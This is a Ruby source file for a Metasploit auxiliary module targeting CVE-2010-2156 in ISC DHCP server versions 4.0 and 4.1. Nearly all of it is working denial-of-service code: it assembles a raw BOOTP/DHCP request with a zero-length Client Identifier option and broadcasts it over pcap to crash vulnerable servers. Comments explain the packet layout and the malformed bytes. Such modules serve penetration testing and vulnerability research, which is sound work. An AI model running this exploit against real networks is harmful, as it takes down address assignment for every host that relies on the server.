##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
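# Auxiliary DoS module for CVE-2010-2156: ISC DHCP servers in the affected
# range exit when asked to hash a zero-length Client Identifier (option 61).
# The module builds one raw BOOTP/DHCP frame and broadcasts it via pcap; it
# never listens for a reply, so success can only be judged on the server side.
class Metasploit3 < Msf::Auxiliary

  include Msf::Auxiliary::Dos
  include Msf::Exploit::Capture

  def initialize
    super(
      'Name'        => 'ISC DHCP Zero Length ClientID Denial of Service Module',
      'Description' => %q{
          This module performs a Denial of Service Attack against the ISC DHCP server,
        versions 4.1 before 4.1.1-P1 and 4.0 before 4.0.2-P1. It sends out a DHCP Request
        message with a 0-length client_id option for an IP address on the appropriate range
        for the dhcp server. When ISC DHCP Server tries to hash this value it exits
        abnormally.
      },
      'Author'      =>
        [
          'sid',             # Original POC
          'theLightCosine'   # msf module
        ],
      'License'     => MSF_LICENSE,
      'Version'     => '$Revision$',
      'References'  =>
        [
          [ 'CVE', '2010-2156' ],
          [ 'OSVDB', '65246'],
          [ 'EDB', '14185']
        ]
    )

    register_options(
      [
        # Placed in the BOOTP ciaddr field; must be an IPv4 address the target
        # server would consider part of its range (see dhcp_req).
        OptAddress.new('RIP', [true, 'A valid IP to request from the server'])
      ]
    )

    # The frame is always broadcast and nothing is captured back, so the
    # capture-mixin options that only matter for sniffing are hidden.
    deregister_options('RHOST','FILTER','PCAPFILE','SNAPLEN','TIMEOUT')
  end

  # Build the malformed DHCPREQUEST and broadcast it once.
  #
  # The pcap handle is released in an `ensure` block so that a failure inside
  # capture_sendto (e.g. no usable interface / MAC lookup failure) does not
  # leak it. The IP source address is left at PacketFu's default; only the
  # destination, ports and payload are set here.
  def run
    open_pcap
    begin
      print_status("Creating DHCP Request with 0-length ClientID")

      pkt = PacketFu::UDPPacket.new
      pkt.ip_daddr  = "255.255.255.255"
      pkt.udp_sport = 68   # bootpc (client)
      pkt.udp_dport = 67   # bootps (server)

      # TODO: Get a DHCP parser into PacketFu
      # Arbitrary 6-byte client hardware address.
      chaddr = "\xaa\xaa\xaa\xaa\xaa\xaa"

      # Magic cookie 63:82:53:63, then:
      #   35 01 03  -> option 53 (DHCP Message Type), len 1, DHCPREQUEST
      #   3d 00     -> option 61 (Client Identifier) with a ZERO length value
      #   ff        -> End option
      # The zero-length option 61 is what the vulnerable server trips over.
      dhcp_payload = "\x63\x82\x53\x63\x35\x01\x03\x3d\x00\xff"

      pkt.payload = dhcp_req(chaddr, dhcp_payload)
      pkt.recalc

      print_status("Sending malformed DHCP request...")
      capture_sendto(pkt, '255.255.255.255')
    ensure
      close_pcap
    end
  end

  # Assemble a raw BOOTP/DHCP message: the 236-byte fixed header (RFC 2131
  # section 2) followed by the caller-supplied options blob.
  #
  # @param chaddr  [String] client hardware address, 1..16 raw bytes; its
  #                length is written to the hlen field
  # @param payload [String] magic cookie plus DHCP options, appended verbatim
  # @param ciaddr  [String] IPv4 address (or resolvable host) stored in the
  #                ciaddr field; defaults to datastore['RIP']
  # @return [String] ASCII-8BIT message suitable as a UDP payload
  # @raise [ArgumentError] if ciaddr does not pack to 4 bytes (e.g. an IPv6
  #                address) or chaddr is not 1..16 bytes
  def dhcp_req(chaddr, payload, ciaddr = datastore['RIP'])
    packed_ip = Rex::Socket.addr_aton(ciaddr)

    # ciaddr is a fixed 4-byte field. Writing a 16-byte IPv6 value into it
    # would lengthen the header and shift every later field, producing a
    # frame that is not a DHCP message at all.
    unless packed_ip.bytesize == 4
      raise ArgumentError, "RIP must be an IPv4 address, got #{ciaddr.inspect}"
    end

    # chaddr occupies 16 bytes; hlen announces how many are significant.
    hlen = chaddr.bytesize
    unless (1..16).include?(hlen)
      raise ArgumentError, "chaddr must be 1..16 bytes, got #{hlen}"
    end

    # Layout (offsets): op(0) htype(1) hlen(2) hops(3) xid(4) secs(8)
    # flags(10) ciaddr(12) yiaddr(16) siaddr(20) giaddr(24) chaddr(28)
    # sname(44) file(108) -> 236 bytes, then the options.
    # op=BOOTREQUEST, htype=1 (Ethernet), xid/secs/flags left zero.
    # Array#pack copies raw bytes and yields ASCII-8BIT regardless of the
    # source-file encoding, which String#[]= on a UTF-8 literal does not
    # guarantee on Ruby 1.9+.
    [
      1,          # op: BOOTREQUEST
      1,          # htype: Ethernet
      hlen,       # hlen
      0,          # hops
      0,          # xid
      0,          # secs
      0,          # flags
      packed_ip,  # ciaddr
      chaddr,     # chaddr, NUL-padded to 16 bytes
      payload     # cookie + options
    ].pack('CCCCNnna4x12a16x192a*')
  end

end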